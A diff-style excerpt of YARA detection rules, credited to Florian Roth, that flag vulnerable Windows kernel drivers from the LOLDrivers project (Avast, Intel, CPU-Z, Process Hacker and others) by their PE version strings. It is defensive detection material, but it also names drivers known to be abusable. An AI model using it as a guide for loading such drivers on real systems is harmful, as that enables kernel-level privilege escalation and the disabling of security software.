+rule LOLDRIVERS_PUA_VULN_Driver_Symanteccorporation_Vproeventmonitorsys_Symanteceventmonitorsdriverdevelopmentedition_7877 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - VProEventMonitor.sys"
+		author = "Florian Roth"
+		id = "84fa4df8-ac81-5de0-994d-9d754642a01e"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11093-L11112"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca"
+		logic_hash = "693ace66d01afcdd61fe23a3baa8b950153d38bdc386a43861005654c269cd3d"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005600500072006f004500760065006e0074004d006f006e00690074006f0072002e0053007900730020002d0020004500760065006e00740020004d006f006e00690074006f00720069006e00670020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530079006d0061006e00740065006300200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e00340035003700300038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005600500072006f004500760065006e0074004d006f006e00690074006f0072002e005300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530079006d0061006e0074006500630020004500760065006e00740020004d006f006e00690074006f00720073002000440072006900760065007200200044006500760065006c006f0070006d0065006e0074002000450064006900740069006f006e }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005600500072006f004500760065006e0074004d006f006e00690074006f0072002e005300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200032003000300037002d0032003000300038002000530079006d0061006e00740065006300200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Wj_Kprocesshacker_C725 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - kprocesshacker.sys"
+		author = "Florian Roth"
+		id = "53a8740a-65a5-5eb5-afc5-b86058982071"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11115-L11133"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c"
+		logic_hash = "78c3a92f79cbbc31d9191da527bf834e366454f1b5109600aca7954ca4e77226"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0077006a00330032 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0038 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006b00700072006f0063006500730073006800610063006b00650072002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004c006900630065006e00730065006400200075006e006400650072002000740068006500200047004e0055002000470050004c002c002000760033002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpot_Avastantivirus_7AD0 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		author = "Florian Roth"
+		id = "e9db51b4-48a2-53a9-999d-5676d0a4aa91"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11136-L11155"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "7ad0ab23023bc500c3b46f414a8b363c5f8700861bc4745cecc14dd34bcee9ed"
+		logic_hash = "2cfb950364b5259679e0dcc7ebe34fd6703ae376b5e1717428a88f0c2ba823f5"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200041006e0074006900200052006f006f0074006b00690074 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00320030002e0034002e00380033002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00320030002e0034002e00380033002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300032003000200041005600410053005400200053006f006600740077006100720065 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_83A1 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
+		author = "Florian Roth"
+		id = "5164ae7c-795d-55fd-837a-e45a054fdd3e"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11158-L11177"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "83a1fabf782d5f041132d7c7281525f6610207b38f33ff3c5e44eb9444dd0cbc"
+		logic_hash = "16b76760cc8831b7e53cb5f12625cd1dcd059253aa195d763011ccc1cf48a2c5"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f007700730020004e0054002f0032003000300030002f0058005000200049002f004f0020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002c00200031002c00200030002c00200031 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002c00200031002c00200030002c00200031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003500200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Trendmicroeyes_C082 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		author = "Florian Roth"
+		id = "36d4d011-edf0-53e8-9665-b75520140df3"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11180-L11199"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "c082514317bf80a2f5129d84a5a55e411a95e32d03a4df1274537704c80e41dd"
+		logic_hash = "de63522d95ff422588d388c3533e268bd09fcf895d60277b7f7470ca7b1e9a33"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00360030002e0030002e0031003000380034 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00360030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200045007900650073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000200028004300290020002000320030003200300020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Creativetechnologyinnovationcoltd_Ctiiosys_Ctiiodriverversion_X_2121 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - CtiIo64.sys"
+		author = "Florian Roth"
+		id = "3cc780a4-7b9c-516e-91a1-705f785922d2"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11202-L11221"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "2121a2bb8ebbf2e6e82c782b6f3c6b7904f686aa495def25cf1cf52a42e16109"
+		logic_hash = "58b715cbea724f7d8f946f613ec35fc3bf29cc34c1e32ebc2910d73092f96d83"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00430054004900200049004f0020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0043007200650061007400690076006500200054006500630068006e006f006c006f0067007900200049006e006e006f0076006100740069006f006e00200043006f002e002c0020004c00540064002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e003000200078003600340020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e00300020007800360034 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0043007400690049006f00360034002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043007400690049006f003600340020004400720069007600650072002000560065007200730069006f006e00200031002e0030 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0043007400690049006f00360034002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003200310020004300540049 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Ssmartsoftwaresolutionsgmbh_Sysdrvs_Sysdrvs_0E53 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - SysDrv3S.sys"
+		author = "Florian Roth"
+		id = "9ace902a-a3bf-56fa-8eb8-99a82c1adf0b"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11224-L11243"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "0e53b58415fa68552928622118d5b8a3a851b2fc512709a90b63ba46acda8b6b"
+		logic_hash = "4d165a6f340f31b18e62ae9f35dd1c5e278217b949e6162119f0e512a262dc38"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530079007300440072007600330053 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00330053002d0053006d00610072007400200053006f00660074007700610072006500200053006f006c007500740069006f006e007300200047006d00620048 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0033002c0035002c0036002c0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0033002e0035002e0036002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00530079007300440072007600330053 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530079007300440072007600330053 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00530079007300440072007600330053002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200032003000300036002d0032003000310034 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_14AD : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		author = "Florian Roth"
+		id = "0501fc8b-cc72-5c03-97cf-411051119ccf"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11246-L11265"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "14adbf0bc43414a7700e5403100cff7fc6ade50bebfab16a17acf2fdda5a9da8"
+		logic_hash = "157a559b87310d33a96c77208afd4ae9ceea23df99417408e413dee0be507dd3"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200061006e0074006900200072006f006f0074006b00690074 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310037002e0039002e0033003700350034002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310037002e0039002e0033003700350034002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003400200041005600410053005400200053006f006600740077006100720065 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Marvintestsolutionsinc_Hwsys_Hw_0483 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - hw.sys"
+		author = "Florian Roth"
+		id = "cfcc8aa0-6fde-56bd-8422-b9cbb559adce"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11268-L11287"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "0483b32f9544e9c3cc3f206e7bc983ea83f5a9ca44864f2af9b8fc10ff45949f"
+		logic_hash = "30c9579c3df11a77899bab8bc0782ee00bf5cb8f08d10925a19de82c609b8373"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004800570020002d002000570069006e0064006f00770073002000580050002d003100310020002800330032002f00360034002000620069007400290020006b00650072006e0065006c0020006d006f00640065002000640072006900760065007200200066006f007200200050004300200070006f007200740073002f006d0065006d006f00720079002f0050004300490020006100630063006500730073 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d0061007200760069006e0020005400650073007400200053006f006c007500740069006f006e0073002c00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002e0030002e0032002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002e0030002e0032002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00480077002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00480057 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00480057002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200031003900390036002d00320030003200330020004d0061007200760069006e0020005400650073007400200053006f006c007500740069006f006e0073002c00200049006e0063002e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Geintelligentplatformsinc_Gedevicedriver_Proficymachineedition_Build_CAC5 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - GEDevDrv.SYS"
+		author = "Florian Roth"
+		id = "d90e2248-2b47-51d5-a3d2-06a7b61bc95d"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11290-L11310"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "cac5dc7c3da69b682097144f12a816530091d4708ca432a7ce39f6abe6616461"
+		hash = "51145a3fa8258aac106f65f34159d23c54b48b6d54ec0421748b3939ab6778eb"
+		logic_hash = "f3c26142b2f18490c79ea7a658397b9c029286a3040bf2159e3fcc76c4bbd788"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0047004500200044006500760069006300650020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0047004500200049006e00740065006c006c006900670065006e007400200050006c006100740066006f0072006d0073002c00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0037002e0030003000200028004200750069006c0064002000350035003100370029 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0037002e0030003000200028004200750069006c0064002000350035003100370029 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0047004500200044006500760069006300650020004400720069007600650072 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500072006f00660069006300790020004d0061006300680069006e0065002000450064006900740069006f006e }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00470045004400650076004400720076002e005300590053 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a900200032003000310031002c00200047004500200049006e00740065006c006c006900670065006e007400200050006c006100740066006f0072006d0073002c00200049006e0063002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Windowsrserverddkprovider_Cpuzsys_Windowsrserverddkdriver_3871 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - cpuz_x64.sys"
+		author = "Florian Roth"
+		id = "ddcb8217-640d-598d-9afd-a1c15d1bbb8c"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11313-L11332"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3"
+		logic_hash = "5613c77f79128bc7ac3bbe698dcd8be2fca2f59cb60a40ed97f0c80ba9aff690"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004300500055004900440020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000530065007200760065007200200032003000300033002000440044004b002000700072006f00760069006400650072 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e00300020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006300700075007a002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000530065007200760065007200200032003000300033002000440044004b0020006400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006300700075007a002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Lowleveldriver_F941 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - GPU-Z.sys"
+		author = "Florian Roth"
+		id = "a65168c0-5f0e-5871-867b-bab6f42b3c21"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11335-L11351"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "f9418b5e90a235339a4a1a889490faca39cd117a51ba4446daa1011da06c7ecd"
+		logic_hash = "fdc81fdc11ac6db386f4c41c2c34ab9dbd8dd93836a6a91b9412288eca7f0411"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004c006f0077002d004c006500760065006c0020004400720069007600650072 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e00360030002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e00360030002e0030002e0030 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004c006f0077002d004c006500760065006c0020004400720069007600650072 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200032003000300034002d00320030003100300020002800630029002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Intelcorporation_Iqvwsys_Intelriqvwsys_37C6 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - iqvw64e.sys, iQVW64.SYS, IQVW32.sys, NalDrv.sys"
+		author = "Florian Roth"
+		id = "f4b17a75-3160-5a73-afe6-531c41fae197"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11354-L11373"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9"
+		logic_hash = "7ab6c3fe4c9cd61c171a71d631a8efc34121bac85e1abf5f281b150f4b6a77a5"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049006e00740065006c0028005200290020004e006500740077006f0072006b0020004100640061007000740065007200200044006900610067006e006f00730074006900630020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0049006e00740065006c00200043006f00720070006f0072006100740069006f006e0020 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0033002e0032002e003100370020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0033002e0032002e00310037 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006900510056005700360034002e005300590053 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0049006e00740065006c0028005200290020006900510056005700360034002e005300590053 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006900510056005700360034002e005300590053 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000300032002d003200300031003800200049006e00740065006c00200043006f00720070006f0072006100740069006f006e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule LOLDRIVERS_PUA_VULN_Driver_Toshibacorporation_Nchgbiosxsys_Toshibabiospackage_3143 : FILE
+{
+	meta:
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - NCHGBIOS2x64.SYS"
+		author = "Florian Roth"
+		id = "c0a7d14e-65aa-51e1-a2c1-88a7c56dce57"
+		date = "2025-03-07"
+		modified = "2025-03-07"
+		reference = "https://github.com/magicsword-io/LOLDrivers"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11376-L11395"
+		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
+		hash = "314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073"
+		logic_hash = "ce2da14c74299d4ad3ab5b882de8bfe810444f21711f2417291bd0298a480e71"
+		score = 40
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00420049004f00530020005500700064006100740065002000440072006900760065007200200046006f0072002000570069006e0064006f007700730020007800360034002000450064006900740069006f006e }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0054004f0053004800490042004100200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0034002e0032002e0034002e00300020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0034002e0032002e0034002e0030 }
